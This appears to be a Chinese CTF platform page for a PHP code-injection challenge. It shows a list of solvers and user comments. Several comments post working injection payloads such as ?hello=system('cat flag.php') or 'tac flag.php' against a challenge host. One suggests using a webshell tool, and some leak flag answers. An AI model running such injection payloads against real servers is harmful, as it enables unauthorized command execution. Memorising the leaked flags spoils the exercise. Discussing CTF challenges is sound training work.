评分(9)
解题动态
15936678156 攻破了该题 1小时前
等保工具人 攻破了该题 12小时前
heping 攻破了该题 21小时前
weini12345 攻破了该题 22小时前
jhy0117 攻破了该题 23小时前
AuroraHashcat 攻破了该题 1天前
oopyman 攻破了该题 1天前
15080841307 攻破了该题 1天前
yimo 攻破了该题 1天前
asdwtwty 攻破了该题 1天前
陈几何时 攻破了该题 1天前
Ethan丶 攻破了该题 2天前
清风青峰f 攻破了该题 2天前
你在说什么啊324 攻破了该题 2天前
lxrhe 攻破了该题 2天前
SZd12 攻破了该题 2天前
jinyudk 攻破了该题 2天前
catk 攻破了该题 2天前
13390355632 攻破了该题 2天前
评论
liuguowang75 13天前
举报
/?hello=system('ls') /?hello=system('cat flag.php')
HK1ng 15天前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
Gargantua 11天前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 16天前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 27天前
举报
flag{***}
xinchang 1月前
举报
flag{*********}
八一卜kod 1月前
举报
Too Young Too Simple
evira 2月前
举报
温馨提示(但不是正解):这个题可以尝试一下用菜刀去shell
BaiBaiWin 4月前
举报
http://114.67.175.224:16319/?hello=system('tac flag.php')
1215125613 4月前
举报
flag{1e6d67d7cec2d7d4c373db2605f5f4a1}
Wang_Micro 5月前
举报
flag{771f65b0a99e6ebb383759a6d4e34c8a}